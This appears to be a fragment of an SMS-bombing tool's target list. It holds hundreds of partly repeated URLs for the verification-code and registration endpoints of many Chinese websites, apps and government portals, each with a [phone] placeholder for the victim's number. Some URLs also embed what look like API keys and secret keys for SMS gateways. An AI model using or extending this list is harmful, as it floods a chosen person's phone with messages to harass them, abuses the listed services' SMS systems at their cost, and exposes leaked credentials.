"http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "http://www.qmxgz.cn/api/Sms/send?phone=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ==", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://h5.gumipet.com/shops_sms_register?phone=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=+86-[ph", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://wsxf.gjxfj.gov.cn/zfp/getyzmservice/getyzm?theme=none&act=addNew2mb=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=齐晨&fromurls=http://www.mianfeidianhua.net/hsnzy.html&content=想咨询。&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "http://1314.buzz:80/index.php?hm=[phone]&ok=", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "https://plus-api.kankan.com/user/login/sms?from=IOS&mobile=[phone]&sign=b41e46a3446472eaca2c0d0618eb7abd&terminal=IOS", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]&_=1584502793693", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]=a70ca68498d9489dbe88e141ba49751267896313", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "https://api.julym.com/hz/api.html?number=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%24%24QD8balMbMtSRigOLwJkGjU%40%40PIsjj1rTgAEWBZDHlnw3%40%40Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + 